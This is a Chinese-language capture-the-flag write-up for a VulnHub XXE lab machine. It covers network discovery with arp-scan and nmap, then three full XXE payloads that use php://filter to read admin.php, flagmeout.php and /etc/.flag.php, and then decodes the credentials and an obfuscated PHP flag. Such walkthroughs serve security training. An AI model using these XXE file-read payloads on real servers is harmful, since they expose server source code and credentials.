靶场复现 | vulhub-XXE | CN-SEC 中文网

admin

102620
文章

87
评论

2024年2月18日23:08:14评论11 views字数 2738阅读9分7秒阅读模式

01 靶机安装

靶机下载地址：

https: //download.vulnhub.com/xxe/XXE.zip

如上地址直接拿到浏览器上，就可以进行靶机下载，下载后的文件夹如下所示：

直接打开虚拟机：

最后使用虚拟机打开（打开的文件在新建虚拟机路径下面）

02 信息收集

已知环境：

kali的IP：192.168.168.128（作为攻击机）XXE靶机未知

1.探测局域网主机

方法一：探测全部，排除选择

arp-scan -l

我们选192.168.168.129

方法二：使用nmap工具，对比MAC地址

nmap 192.168.168.100-199（探测192.168.93.100到192.168.93.199之中的所有主机）

‍

nmap -sA 192.168.168.0/24（探测0-24网段端口和服务）

对比mac地址成功！

结果：XXE靶机：192.168.168.129

由上图可以看出，XXE开放了80号端口，http协议端口开放，说明有web站点，访问192.168.168.129，结果如下所示：

2. 信息收集

对于一个已知道的站点，第一步肯定是扫描，机器有御剑，AWVS，还可以使用burpsuit爬取网页结构等等，这里直接说信息收集的结果：

发现robots.txt文件，地址

http://192.168.168.129/robots.txt

具体结果如下：

03 解题

由上一步的信息收集我们可以知道，该网站有如下两个目录：

http://192.168.168.129/xxe/admin.phphttp://192.168.168.129/xxe/

先进入http://192.168.168.129/xxe/；尝试登录并抓包：

POC如下所示：

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">]><root><name>&admin;</name><password>admin</password></root>

进入重放模块，使用POC进行分析：

进行base64解码；

继续MD5解码：

解码结果分析可得用户名和密码：

administhebest / admin@123

进行登录

http://192.168.168.129/xxe/admin.php

发现Flag.php，点击查看
发现新文件flagmeout.php

在burp中读取文件：

读取flagmeout.php文件的POC如下所示：

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=./flagmeout.php">]><root><name>&admin;</name><password>admin</password></root>

base64解码结果如下所示：

<?php$flag = "";echo $flag;?>JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5

对JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5进行base32解码后再进行base64解码后的结果为

/etc/.flag.php

然后读取/etc/.flag.php中的内容，POC如下所示：

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">]><root><name>&admin;</name><password>admin</password></root>

其中内容解码结果如下所示，直接PHP运行得到结果：

$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$Ã€=+_;$Ã=$Ã‚=$Ãƒ=$Ã„=$Ã†=$Ãˆ=$Ã‰=$ÃŠ=$Ã‹=++$Ã[];$Ã‚++;$Ãƒ++;$Ãƒ++;$Ã„++;$Ã„++;$Ã„++;$Ã†++;$Ã†++;$Ã†++;$Ã†++;$Ãˆ++;$Ãˆ++;$Ãˆ++;$Ãˆ++;$Ãˆ++;$Ã‰++;$Ã‰++;$Ã‰++;$Ã‰++;$Ã‰++;$Ã‰++;$ÃŠ++;$ÃŠ++;$ÃŠ++;$ÃŠ++;$ÃŠ++;$ÃŠ++;$ÃŠ++;$Ã‹++;$Ã‹++;$Ã‹++;$Ã‹++;$Ã‹++;$Ã‹++;$Ã‹++;$__('$_="'.$___.$Ã.$Ã‚.$Ãƒ.$___.$Ã.$Ã€.$Ã.$___.$Ã.$Ã€.$Ãˆ.$___.$Ã.$Ã€.$Ãƒ.$___.$Ã.$Ã‚.$Ãƒ.$___.$Ã.$Ã‚.$Ã€.$___.$Ã.$Ã‰.$Ãƒ.$___.$Ã.$Ã‰.$Ã€.$___.$Ã.$Ã‰.$Ã€.$___.$Ã.$Ã„.$Ã†.$___.$Ã.$Ãƒ.$Ã‰.$___.$Ã.$Ã†.$Ã.$___.$Ã.$Ãˆ.$Ãƒ.$___.$Ã.$Ãƒ.$Ã‰.$___.$Ã.$Ãˆ.$Ãƒ.$___.$Ã.$Ã†.$Ã‰.$___.$Ã.$Ãƒ.$Ã‰.$___.$Ã.$Ã„.$Ã†.$___.$Ã.$Ã„.$Ã.$___.$Ã.$Ãˆ.$Ãƒ.$___.$Ã.$Ã‰.$Ã.$___.$Ã.$Ã‰.$Ã†.'"');$__($_);

创建1.php

记得添加结构：

<?php ?>

本地访问：出现空白或者报错页面。

成功！！！

原文始发于微信公众号（小木说安全）：靶场复现 | vulhub-XXE

左青龙
微信扫一扫

右白虎
微信扫一扫

靶场复现 | vulhub-XXE

已知环境：

1.探测局域网主机

2. 信息收集

渗透测试|一次丝滑的渗透测试记录

2FA bypass 让我赚了 $______

实战解读：Llama 3 安全性对抗分析

记一次对抗中的钓鱼

深入剖析：如何使用Pulsar和Arthas高效排查消息队列延迟问题

【2024HW】|4-蓝队面试题

最新H1越权漏洞披露，获得15000美元奖励

某次小红书帮助下的Edu挖掘

实战 | 参数走私导致的权限绕过

观点 | 视频生成人工智能Sora的法律问题研究

发表评论

在线咨询

微信